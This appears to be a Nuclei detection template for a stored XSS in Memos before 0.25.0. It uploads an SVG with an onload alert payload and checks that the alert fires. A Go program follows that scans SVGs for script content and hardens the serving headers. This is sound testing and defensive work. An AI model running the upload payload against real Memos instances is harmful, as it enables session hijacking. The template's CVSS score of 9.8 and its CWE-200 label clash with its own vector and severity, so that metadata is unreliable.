Vulnerability Description
An authenticated attacker can upload a specially crafted SVG file containing JavaScript code to Memos versions prior to 0.25.0, leading to a stored cross-site scripting (XSS) vulnerability.
id: CVE-2025-50738

info:
  name: Memos < 0.25.0 - Stored Cross-Site Scripting
  author: SeongHyeonJeon[nukunga]
  severity: medium
  description: |
    An authenticated attacker can upload a specially crafted SVG file containing JavaScript code to Memos versions prior to 0.25.0, leading to a stored cross-site scripting (XSS) vulnerability.
  reference:
    - https://github.com/usememos/memos/issues/4707
    - https://github.com/advisories/GHSA-hfcf-79gh-f3jc
    - https://nvd.nist.gov/vuln/detail/CVE-2025-50738
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 9.8
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 3
  tags: cve,cve2025,xss,memos,authenticated,headless

variables:
  username: "{{username}}"
  password: "{{password}}"
  filename: "{{rand_base(8)}}"

http:
  - raw:
      - |
        POST /api/v1/auth/signin?username={{username}}&password={{password}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

      - |
        POST /api/v1/resources HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "filename": "{{filename}}.svg",
          "content": "PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIG9ubG9hZD0iYWxlcnQoMSkiPjwvc3ZnPg==",
          "type": "image/svg+xml"
        }

    extractors:
      - type: regex
        name: resource_id
        internal: true
        part: body
        group: 1
        regex:
          - '"name":"resources/([A-Za-z0-9]+)"'

headless:
  - steps:
      - action: navigate
        args:
          url: "{{BaseURL}}/file/resources/{{resource_id}}/{{filename}}.svg"
      - action: waitdialog
        name: xss_alert

    matchers:
      - type: dsl
        dsl:
          - xss_alert == true
          - xss_alert_message == "1"
          - xss_alert_type == "alert"
        condition: and
# digest: 4a0a00473045022100ce3c86a562055b8e07c0df1d0c67052f766dd955fefed68ae501453ed3cf63ee02207401fb21456121d6532f3e38fe8bae8913ef50c2400642257b92a8fbcc5d0321:922c64590222798bb761d5b6d8e72950
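The template above works because the uploaded SVG is stored as-is and later served inline at a same-origin URL, so its `onload` handler runs in the viewer's session. The following Go program is an added example written for this page; it is not code from Memos and does not reproduce the fix shipped in 0.25.0 (which is an assumption left unstated here). It decodes the base64 `content` value from the template, scans the resulting SVG for script-capable constructs before storage, and shows the response headers a resource endpoint can send so that an SVG which slips past the scan is still downloaded rather than rendered as an active same-origin document. The header set and the function names are illustrative choices, not Memos' API.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"encoding/xml"
	"fmt"
	"io"
	"net/http"
	"strings"
)

// Base64 "content" value taken from the template above. It decodes to an <svg>
// element whose onload attribute runs script when the file is rendered inline.
const uploadedContentB64 = "PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIG9ubG9hZD0iYWxlcnQoMSkiPjwvc3ZnPg=="

// Constructed harmless SVG used for comparison (not from the page).
const benignSVG = `<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4"/></svg>`

// svgActiveContent walks the XML token stream of an SVG document and returns a
// short description of the first script-capable construct it meets (script or
// foreignObject elements, on* event attributes, javascript: hrefs), or "" when
// none is found. It checks every element, not only the root, and returns parse
// errors so the caller rejects malformed XML instead of storing it. The on*
// prefix test is deliberately conservative: a false positive on an unusual
// attribute is cheaper than a missed handler.
func svgActiveContent(svg []byte) (string, error) {
	dec := xml.NewDecoder(bytes.NewReader(svg))
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return "", nil
		}
		if err != nil {
			return "", err
		}
		se, ok := tok.(xml.StartElement)
		if !ok {
			continue
		}
		name := strings.ToLower(se.Name.Local)
		if name == "script" || name == "foreignobject" {
			return "element <" + name + ">", nil
		}
		for _, a := range se.Attr {
			an := strings.ToLower(a.Name.Local)
			av := strings.ToLower(strings.TrimSpace(a.Value))
			if strings.HasPrefix(an, "on") {
				return "attribute " + an, nil
			}
			if an == "href" && strings.HasPrefix(av, "javascript:") {
				return "attribute " + an + "=javascript:", nil
			}
		}
	}
}

// scanUpload decodes the base64 "content" field of an upload request (the
// shape used by the template's POST /api/v1/resources body) and reports
// whether the SVG may be stored, with a reason when it may not.
func scanUpload(contentB64 string) (bool, string) {
	raw, err := base64.StdEncoding.DecodeString(contentB64)
	if err != nil {
		return false, "bad base64: " + err.Error()
	}
	found, err := svgActiveContent(raw)
	if err != nil {
		return false, "malformed SVG: " + err.Error()
	}
	if found != "" {
		return false, "active content: " + found
	}
	return true, ""
}

// resourceHeaders builds the response headers for serving a stored upload.
// SVG is sent as an attachment inside a script-less CSP sandbox, so a scanner
// bypass still cannot execute as a same-origin document in the viewer's
// session. Illustrative hardening (assumed), not the Memos 0.25.0 fix.
func resourceHeaders(contentType string) http.Header {
	h := http.Header{}
	h.Set("Content-Type", contentType)
	h.Set("X-Content-Type-Options", "nosniff")
	if strings.HasPrefix(strings.ToLower(contentType), "image/svg") {
		h.Set("Content-Disposition", "attachment")
		h.Set("Content-Security-Policy", "sandbox; script-src 'none'")
	} else {
		h.Set("Content-Disposition", "inline")
	}
	return h
}

func main() {
	ok, why := scanUpload(uploadedContentB64)
	fmt.Printf("template payload accepted=%v %s\n", ok, why)
	ok, why = scanUpload(base64.StdEncoding.EncodeToString([]byte(benignSVG)))
	fmt.Printf("benign svg accepted=%v %s\n", ok, why)
	for k, v := range resourceHeaders("image/svg+xml") {
		fmt.Printf("%s: %s\n", k, strings.Join(v, ", "))
	}
}
```

The two layers are intentionally independent: the scan rejects the obvious cases at upload time, while the headers remove the impact of anything the scan misses, since an SVG delivered with `Content-Disposition: attachment` and a `sandbox` policy is never executed in the origin that stores it. Relying on the scan alone would repeat the class of problem the template exploits, because SVG has more script-bearing constructs than an allowlist can comfortably cover.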